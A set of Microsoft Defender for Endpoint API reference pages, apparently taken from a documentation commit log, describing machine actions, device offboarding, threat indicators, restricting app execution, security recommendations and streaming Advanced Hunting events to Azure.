-|Method|Return Type|Description|
-||||
-|[List MachineActions](get-machineactions-collection.md)|[Machine Action](machineaction.md)|List [Machine Action](machineaction.md) entities.|
-|[Get MachineAction](get-machineaction-object.md)|[Machine Action](machineaction.md)|Get a single [Machine Action](machineaction.md) entity.|
-|[Collect investigation package](collect-investigation-package.md)|[Machine Action](machineaction.md)|Collect investigation package from a [machine](machine.md).|
-|[Get investigation package SAS URI](get-package-sas-uri.md)|[Machine Action](machineaction.md)|Get URI for downloading the investigation package.|
-|[Isolate machine](isolate-machine.md)|[Machine Action](machineaction.md)|Isolate [machine](machine.md) from network.|
-|[Release machine from isolation](unisolate-machine.md)|[Machine Action](machineaction.md)|Release [machine](machine.md) from Isolation.|
-|[Restrict app execution](restrict-code-execution.md)|[Machine Action](machineaction.md)|Restrict application execution.|
-|[Remove app restriction](unrestrict-code-execution.md)|[Machine Action](machineaction.md)|Remove application execution restriction.|
-|[Run antivirus scan](run-av-scan.md)|[Machine Action](machineaction.md)|Run an AV scan using Windows Defender (when applicable).|
-|[Offboard machine](offboard-machine-api.md)|[Machine Action](machineaction.md)|Offboard [machine](machine.md) from Microsoft Defender for Endpoint.|
-|[Stop and quarantine file](stop-and-quarantine-file.md)|[Machine Action](machineaction.md)|Stop execution of a file on a machine and delete it.|
-|[Run live response](run-live-response.md)|[Machine Action](machineaction.md)|Runs a sequence of live response commands on a device|
-|[Get live response result](get-live-response-result.md)|URL entity|Retrieves specific live response command result download link by its index.|
-|[Cancel machine action](cancel-machine-action.md)|[Machine Action](machineaction.md)|Cancel an active machine action.|
-
-<br>
-
-## Properties
-
-|Property|Type|Description|
-||||
-|ID|Guid|Identity of the [Machine Action](machineaction.md) entity.|
-|type|Enum|Type of the action. Possible values are: `RunAntiVirusScan`, `Offboard`, `LiveResponse`, `CollectInvestigationPackage`, `Isolate`, `Unisolate`, `StopAndQuarantineFile`, `RestrictCodeExecution`, and `UnrestrictCodeExecution`.|
-|scope|string|Scope of the action. `Full` or `Selective` for Isolation, `Quick` or `Full` for antivirus scan.|
-|requestor|String|Identity of the person that executed the action.|
-|externalID|String|Id the customer can submit in the request for custom correlation.|
-|requestSource|string|The name of the user/application that submitted the action.|
-|commands|array|Commands to run. Allowed values are PutFile, RunScript, GetFile.|
-|cancellationRequestor|String|Identity of the person that canceled the action.|
-|requestorComment|String|Comment that was written when issuing the action.|
-|cancellationComment|String|Comment that was written when canceling the action.|
-|status|Enum|Current status of the command. Possible values are: `Pending`, `InProgress`, `Succeeded`, `Failed`, `TimeOut`, and `Cancelled`.|
-|machineId|String|ID of the [machine](machine.md) on which the action was executed.|
-|computerDnsName|String|Name of the [machine](machine.md) on which the action was executed.|
-|creationDateTimeUtc|DateTimeOffset|The date and time when the action was created.|
-|cancellationDateTimeUtc|DateTimeOffset|The date and time when the action was canceled.|
-|lastUpdateDateTimeUtc|DateTimeOffset|The last date and time when the action status was updated.|
-|title|String|Machine action title.|
-|relatedFileInfo|Class|Contains two Properties. string `fileIdentifier`, Enum `fileIdentifierType` with the possible values: `Sha1`, `Sha256`, and `Md5`.|
-
-## Json representation
-
-```json
-{
- "id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
- "type": "Isolate",
- "scope": "Selective",
- "requestor": "Analyst@TestPrd.onmicrosoft.com",
- "requestorComment": "test for docs",
- "status": "Succeeded",
- "machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
- "computerDnsName": "desktop-test",
- "creationDateTimeUtc": "2019-01-02T14:39:38.2262283Z",
- "lastUpdateDateTimeUtc": "2019-01-02T14:40:44.6596267Z",
- "relatedFileInfo": null
-}
-```
security Management Apis https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/management-apis.md
- Title: Overview of management and APIs-
-description: Learn about the management tools and API categories in Microsoft Defender for Endpoint
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Overview of management and APIs
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mgt-apis-abovefoldlink)
--
-Defender for Endpoint supports a wide variety of options to ensure that customers can easily adopt the platform.
-
-Acknowledging that customer environments and structures can vary, Defender for Endpoint was created with flexibility and granular control to fit varying customer requirements.
-
-## Endpoint onboarding and portal access
-
-Device onboarding is fully integrated into Microsoft Configuration Manager and Microsoft Intune for client devices and Microsoft Defender for server devices, providing complete end-to-end experience of configuration, deployment, and monitoring. In addition, Microsoft Defender for Endpoint supports Group Policy and other third-party tools used for devices management.
-
-Defender for Endpoint provides fine-grained control over what users with access to the portal can see and do through the flexibility of role-based access control (RBAC). The RBAC model supports all flavors of security teams structure:
--- Globally distributed organizations and security teams-- Tiered model security operations teams-- Fully segregated divisions with single centralized global security operations teams-
-## Available APIs
-
-The Microsoft Defender for Endpoint solution is built on top of an integration-ready platform.
-
-Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will enable you to automate workflows and innovate based on Defender for Endpoint capabilities.
--
-The Defender for Endpoint APIs can be grouped into three:
--- Microsoft Defender for Endpoint APIs-- Raw data streaming API-- SIEM integration-
-## Microsoft Defender for Endpoint APIs
-
-Defender for Endpoint offers a layered API model exposing data and capabilities in a structured, clear, and easy to use model, exposed through a standard Azure AD-based authentication and authorization model allowing access in context of users or SaaS applications. The API model was designed to expose entities and capabilities in a consistent form.
-
-Watch this video for a quick overview of Defender for Endpoint's APIs.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4d73M]
-
-The **Investigation API** exposes the richness of Defender for Endpoint - exposing calculated or 'profiled' entities (for example, device, user, and file) and discrete events (for example, process creation and file creation) which typically describes a behavior related to an entity, enabling access to data via investigation interfaces allowing a query-based access to data. For more information, see [Supported APIs](exposed-apis-list.md).
-
-The **Response API** exposes the ability to take actions in the service and on devices, enabling customers to ingest indicators, manage settings, alert status, as well as take response actions on devices programmatically such as isolate devices from the network, quarantine files, and others.
-
-## Raw data streaming API
-
-Defender for Endpoint raw data streaming API provides the ability for customers to ship real-time events and alerts from their instances as they occur within a single data stream, providing a low latency, high throughput delivery mechanism.
-
-The Defender for Endpoint event information is pushed directly to Azure storage for long-term data retention, or to Azure Event Hubs for consumption by visualization services or additional data processing engines.
-
-For more information, see [Raw data streaming API](raw-data-export.md).
-
-The new Microsoft Defender XDR Streaming API includes email and alert events in addition to device events.
-For more information, see [Microsoft Defender XDR Streaming API](../../defender/streaming-api.md).
-
-## SIEM API
-
-When you enable security information and event management (SIEM) integration, it allows you to pull detections from Microsoft Defender XDR using your SIEM solution or by connecting directly to the detections REST API. This activates the SIEM connector access details section with pre-populated values and an application is created under your Microsoft Entra tenant.
-
-## Related topics
--- [Access the Microsoft Defender for Endpoint APIs](apis-intro.md)-- [Supported APIs](exposed-apis-list.md)-- [Technical partner opportunities](../partner-integration.md)
security Offboard Machine Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/offboard-machine-api.md
- Title: Offboard machine API
-description: Learn how to use an API to offboard a device from Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Offboard machine API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Offboard device from Defender for Endpoint.
-
-## Limitations
--- Rate limitations for this API are 100 calls per minute and 1500 calls per hour.-
- [!include[Machine actions note](../../../includes/machineactionsnote.md)]
-
-> [!NOTE]
-> - This API is supported on Windows 11, Windows 10, version 1703 and later; on Windows Server 2019 and later; and on Windows Server 2012 R2 and Windows Server 2016 when using the [new, unified agent for Defender for Endpoint](../update-agent-mma-windows.md#upgrade-to-the-new-unified-agent-for-defender-for-endpoint).
-> - This API is not supported on macOS or Linux devices.
-> - Running the offboarding API only stops the sensor service from running, but it does not remove the onboarding information from the registry like an offboarding script does.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Machine.Offboard|'Offboard machine'
-Delegated (work or school account)|Machine.Offboard|'Offboard machine'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to 'Global Admin' AD role
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.security.microsoft.com/api/machines/{id}/offboard
-```
-
-The machine ID can be found in the URL when you select the device. Generally, it's a 40 digit alphanumeric number that can be found in the URL.
-
-## Request headers
-
-Name|Type|Description
-||
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-||
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 200 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-## Example
-
-### Request
-
-Here's an example of the request. If there's no JSON comment added, it will error out with code **400**.
-
-```http
-POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/offboard
-```
-
-```json
-{
- "Comment": "Offboard machine by automation"
-}
-```
security Post Ti Indicator https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/post-ti-indicator.md
- Title: Submit or Update Indicator API
-description: Learn how to use the Submit or Update Indicator API to submit or update a new Indicator entity in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Submit or Update Indicator API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Submits or Updates new [Indicator](ti-indicator.md) entity.
-
-CIDR notation for IPs isn't supported.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-2. There's a limit of 15,000 active indicators per tenant.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-|:|:|:|
-|Application|Ti.ReadWrite|`Read and write Indicators`|
-|Application|Ti.ReadWrite.All|`Read and write All Indicators`|
-|Delegated (work or school account)|Ti.ReadWrite|`Read and write Indicators`|
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-indicatorValue|String|Identity of the [Indicator](ti-indicator.md) entity. **Required**
-indicatorType|Enum|Type of the indicator. Possible values are: `FileSha1`, `FileMd5`, `CertificateThumbprint`, `FileSha256`, `IpAddress`, `DomainName`, and `Url`. **Required**
-action|Enum|The action that is taken if the indicator is discovered in the organization. Possible values are: `Alert`, `Warn`, `Block`, `Audit`, `BlockAndRemediate`, `AlertAndBlock`, and `Allowed`. **Required**. The `GenerateAlert` parameter must be set to `TRUE` when creating an action with `Audit`.
-application|String|The application associated with the indicator. This field only works for new indicators. It doesn't update the value on an existing indicator. **Optional**
-title|String|Indicator alert title. **Required**
-description|String|Description of the indicator. **Required**
-expirationTime|DateTimeOffset|The expiration time of the indicator. **Optional**
-severity|Enum|The severity of the indicator. Possible values are: `Informational`, `Low`, `Medium`, and `High`. **Optional**
-recommendedActions|String|TI indicator alert recommended actions. **Optional**
-rbacGroupNames|String|Comma-separated list of RBAC group names the indicator would be applied to. **Optional**
-educateUrl|String|Custom notification/support URL. Supported for Block and Warn action types for URL indicators. **Optional**
-generateAlert|Enum|**True** if alert generation is required, **False** if this indicator shouldn't generate an alert.
-## Response
--- If successful, this method returns 200 - OK response code and the created / updated [Indicator](ti-indicator.md) entity in the response body.-- If not successful: this method return 400 - Bad Request. Bad request usually indicates incorrect body.-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/indicators
-```
-
-```json
-{
- "indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
- "indicatorType": "FileSha1",
- "title": "test",
- "application": "demo-test",
- "expirationTime": "2020-12-12T00:00:00Z",
- "action": "AlertAndBlock",
- "severity": "Informational",
- "description": "test",
- "recommendedActions": "nothing",
- "rbacGroupNames": ["group1", "group2"]
-}
-```
-
-## Related article
--- [Manage indicators](../manage-indicators.md)
security Raw Data Export Event Hub https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/raw-data-export-event-hub.md
- Title: Stream Microsoft Defender for Endpoint events to Azure Event Hubs
-description: Learn how to configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Event Hubs.
------- m365-security-- tier3-- must-keep--- Previously updated : 10/24/2023--
-# Configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Azure Event Hubs
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!NOTE]
-> For the full data streaming experience available, please visit [Stream Microsoft Defender XDR events | Microsoft Learn](/microsoft-365/security/defender/streaming-api).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configuresiem-abovefoldlink)
-
-## Before you begin
-
-1. Create an [event hub](/azure/event-hubs/) in your tenant.
-
-2. Log in to your [Azure tenant](https://ms.portal.azure.com/), go to **Subscriptions > Your subscription > Resource Providers > Register to Microsoft.insights**.
-
-## Enable raw data streaming
-
-1. Log in to the [Microsoft Defender XDR](https://security.microsoft.com) as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to the [Data export settings page](https://security.microsoft.com/securitysettings/defender/raw_data_export) in the Microsoft Defender portal.
-
-3. Click on **Add data export settings**.
-
-4. Choose a name for your new settings.
-
-5. Choose **Forward events to Azure Event Hubs**.
-
-6. Type your **Event Hubs name** and your **Event Hubs resource ID**.
-
-> [!NOTE]
-> Leaving Event Hubs name as empty will create an event hub for each category in the selected namespace. Event Hubs namespaces have a limit of 10 Event Hubs if you are not using a Dedicated Event Hubs Cluster.
-
- In order to get your **Event Hubs resource ID**, go to your Azure Event Hubs namespace page on [Azure](https://ms.portal.azure.com/) > properties tab \> copy the text under **Resource ID**:
-
- :::image type="content" source="../media/event-hub-resource-id.png" alt-text="The Event Hubs resource Id-1" lightbox="../media/event-hub-resource-id.png":::
-
-7. Choose the events you want to stream and click **Save**.
-
-## The schema of the events in Azure Event Hubs
-
-```json
-{
- "records": [
- {
- "time": "<The time WDATP received the event>"
- "tenantId": "<The Id of the tenant that the event belongs to>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <WDATP Advanced Hunting event as Json> }
- }
- ...
- ]
-}
-```
--- Each event hub message in Azure Event Hubs contains list of records.--- Each record contains the event name, the time Microsoft Defender for Endpoint received the event, the tenant it belongs (you will only get events from your tenant), and the event in JSON format in a property called "**properties**".--- For more information about the schema of Microsoft Defender for Endpoint events, see [Advanced Hunting overview](../advanced-hunting-overview.md).--- In Advanced Hunting, the **DeviceInfo** table has a column named **MachineGroup** which contains the group of the device. Here every event will be decorated with this column as well. See [Device Groups](../machine-groups.md) for more information.
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Data types mapping
-
-To get the data types for event properties do the following:
-
-1. Log in to [Microsoft Defender XDR](https://security.microsoft.com) and go to [Advanced Hunting page](https://security.microsoft.com/hunting-package).
-
-2. Run the following query to get the data types mapping for each event:
-
- ```kusto
- {EventType}
- | getschema
- | project ColumnName, ColumnType
- ```
--- Here is an example for Device Info event:-
- :::image type="content" source="../media/machine-info-datatype-example.png" alt-text="The Event Hubs resource Id-2" lightbox="../media/machine-info-datatype-example.png":::
-
-## Related topics
--- [Stream Microsoft Defender XDR events | Microsoft Learn](/microsoft-365/security/defender/streaming-api)--- [Overview of Advanced Hunting](../advanced-hunting-overview.md)-- [Microsoft Defender for Endpoint streaming API](raw-data-export.md)-- [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md)-- [Azure Event Hubs documentation](/azure/event-hubs/)-- [Troubleshoot connectivity issues - Azure Event Hubs](/azure/event-hubs/troubleshooting-guide)
security Raw Data Export Storage https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/raw-data-export-storage.md
- Title: Stream Microsoft Defender for Endpoint events to your Storage account
-description: Learn how to configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Storage account.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Storage account
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!NOTE]
-> For the full data streaming experience available, please visit [Stream Microsoft Defender XDR events | Microsoft Learn](/microsoft-365/security/defender/streaming-api).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configuresiem-abovefoldlink)
-
-## Before you begin
-
-1. Create a [Storage account](/azure/storage/common/storage-account-overview) in your tenant.
-
-2. Sign in to your [Azure tenant](https://ms.portal.azure.com/), go to **Subscriptions > Your subscription > Resource Providers > Register to Microsoft.insights**.
-
-## Enable raw data streaming
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to [Data export settings page](https://security.microsoft.com/settings/mtp_settings/raw_data_export) in Microsoft Defender XDR.
-
-3. Select on **Add data export settings**.
-
-4. Choose a name for your new settings.
-
-5. Choose **Forward events to Azure Storage**.
-
-6. Type your **Storage Account Resource ID**. In order to get your **Storage Account Resource ID**, go to your Storage account page on [Azure portal](https://ms.portal.azure.com/) \> properties tab \> copy the text under **Storage account resource ID**:
-
- :::image type="content" source="../media/storage-account-resource-id.png" alt-text="The Event Hubs with resource ID1" lightbox="../media/storage-account-resource-id.png":::
-
-7. Choose the events you want to stream and select **Save**.
-
-## The schema of the events in the Storage account
--- A blob container is created for each event type:-
- :::image type="content" source="../media/storage-account-event-schema.png" alt-text="The Event Hubs with resource ID2" lightbox="../media/storage-account-event-schema.png":::
--- The schema of each row in a blob is the following JSON:-
- ```json
- {
- "time": "<The time WDATP received the event>"
- "tenantId": "<Your tenant ID>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <WDATP Advanced Hunting event as Json> }
- }
- ```
--- Each blob contains multiple rows.--- Each row contains the event name, the time Defender for Endpoint received the event, the tenant it belongs (you get events only from your tenant), and the event in JSON format in a property called "properties".--- For more information about the schema of Microsoft Defender for Endpoint events, see [Advanced Hunting overview](../advanced-hunting-overview.md).--- In Advanced Hunting, the **DeviceInfo** table has a column named **MachineGroup** which contains the group of the device. Here, every event is decorated with this column as well. For more information, see [Device Groups](../machine-groups.md).
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Data types mapping
-
-In order to get the data types for our events properties do the following:
-
-1. Sign in to [Microsoft Defender XDR](https://security.microsoft.com) and go to [Advanced Hunting page](https://security.microsoft.com/hunting-package).
-
-2. Run the following query to get the data types mapping for each event:
-
- ```kusto
- {EventType}
- | getschema
- | project ColumnName, ColumnType
- ```
--- Here's an example for Device Info event:-
- :::image type="content" source="../media/data-types-mapping-query.png" alt-text="The Event Hubs with resource ID3" lightbox="../media/data-types-mapping-query.png":::
-
-## Related articles
--- [Stream Microsoft Defender XDR events | Microsoft Learn](/microsoft-365/security/defender/streaming-api)--- [Overview of Advanced Hunting](../advanced-hunting-overview.md)-- [Microsoft Defender for Endpoint Streaming API](raw-data-export.md)-- [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Raw Data Export https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/raw-data-export.md
- Title: Stream Microsoft Defender for Endpoint event
-description: Learn how to configure Microsoft Defender for Endpoint to stream Advanced Hunting events to Event Hubs or Azure storage account
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Raw Data Streaming API
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)--
-> [!TIP]
-> For the full data streaming experience available, see [Stream Microsoft Defender XDR events](/microsoft-365/security/defender/streaming-api).
-> If you're using Microsoft Defender for Business, see [Use the streaming API with Microsoft Defender for Business](../../defender-business/mdb-streaming-api.md).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configuresiem-abovefoldlink)
-
-## Stream Advanced Hunting events to Event Hubs and/or Azure storage account
-
-Microsoft Defender for Endpoint supports streaming events available through [Advanced Hunting](../../defender/advanced-hunting-overview.md) to an [Event Hubs](/azure/event-hubs/) and/or [Azure storage account](/azure/storage/common/storage-account-overview).
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4r4ga]
-
-## In this section
-
-Topic|Description
-:|:
-[Stream Microsoft Defender for Endpoint events to Azure Event Hubs](raw-data-export-event-hub.md)|Learn about enabling the streaming API in your tenant and configure Defender for Endpoint to stream [Advanced Hunting](../advanced-hunting-overview.md) to Event Hubs.
-[Stream Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md)|Learn about enabling the streaming API in your tenant and configure Defender for Endpoint to stream [Advanced Hunting](../advanced-hunting-overview.md) to your Azure storage account.
-
-## Related topics
--- [Stream Microsoft Defender XDR events | Microsoft Learn](/microsoft-365/security/defender/streaming-api)--- [Overview of Advanced Hunting](../advanced-hunting-overview.md)-- [Azure Event Hubs documentation](/azure/event-hubs/)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Recommendation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/recommendation.md
- Title: Recommendation methods and properties
-description: Retrieves the top recent alerts.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Recommendation resource type
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Methods
-
-<br>
-
-****
-
-|Method|Return Type|Description|
-||||
-|[List all recommendations](get-all-recommendations.md)|Recommendation collection|Retrieves a list of all security recommendations affecting the organization|
-|[Get recommendation by ID](get-recommendation-by-id.md)|Recommendation|Retrieves a security recommendation by its ID|
-|[Get recommendation software](list-recommendation-software.md)|[Software](software.md)|Retrieves a security recommendation related to a specific software|
-|[Get recommendation devices](get-recommendation-machines.md)|MachineRef collection|Retrieves a list of devices associated with the security recommendation|
-|[Get recommendation vulnerabilities](get-recommendation-vulnerabilities.md)|[Vulnerability](vulnerability.md) collection|Retrieves a list of vulnerabilities associated with the security recommendation|
-|
-
-## Properties
-
-<br>
-
-****
-
-|Property|Type|Description|
-||||
-|id|String|Recommendation ID|
-|productName|String|Related software name|
-|recommendationName|String|Recommendation name|
-|Weaknesses|Long|Number of discovered vulnerabilities|
-|Vendor|String|Related vendor name|
-|recommendedVersion|String|Recommended version|
-|recommendedProgram|String|Recommended program|
-|recommendedVendor|String|Recommended vendor|
-|recommendationCategory|String|Recommendation category. Possible values are: `Accounts`, `Application`, `Network`, `OS`, `SecurityControls`|
-|subCategory|String|Recommendation subcategory|
-|severityScore|Double|Potential impact of the configuration to the organization's Microsoft Secure Score for Devices (1-10)|
-|publicExploit|Boolean|Public exploit is available|
-|activeAlert|Boolean|Active alert is associated with this recommendation|
-|associatedThreats|String collection|Threat analytics report is associated with this recommendation|
-|remediationType|String|Remediation type. Possible values are: `ConfigurationChange`,`Update`,`Upgrade`,`Uninstall`|
-|Status|Enum|Recommendation exception status. Possible values are: `Active` and `Exception`|
-|configScoreImpact|Double|Microsoft Secure Score for Devices impact|
-|exposureImpact|Double|Exposure score impact|
-|totalMachineCount|Long|Number of installed devices|
-|exposedMachinesCount|Long|Number of installed devices that are exposed to vulnerabilities|
-|nonProductivityImpactedAssets|Long|Number of devices that aren't affected|
-|relatedComponent|String|Related software component|
-|
security Restrict Code Execution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/restrict-code-execution.md
- Title: Restrict app execution API
-description: Use this API to create calls related to restricting an application from executing.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Restrict app execution API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Restrict execution of all applications on the device except a predefined set.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
---
-> [!IMPORTANT]
->
-> - This action is available for devices on Windows 10, version 1709 or later, and on Windows 11.
-> - This feature is available if your organization uses Microsoft Defender Antivirus.
-> - This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see [Code integrity policy formats and signing](/windows/device-security/device-guard/requirements-and-deployment-planning-guidelines-for-device-guard#code-integrity-policy-formats-and-signing).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.RestrictExecution|'Restrict code execution'
-Delegated (work or school account)|Machine.RestrictExecution|'Restrict code execution'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/restrictCodeExecution
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-If you send multiple API calls to restrict app execution for the same device, it returns "pending machine action" or HTTP 400 with the message "Action is already in progress".
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/restrictCodeExecution
-```
-
-```json
-{
- "Comment": "Restrict code execution due to alert 1234"
-}
-```
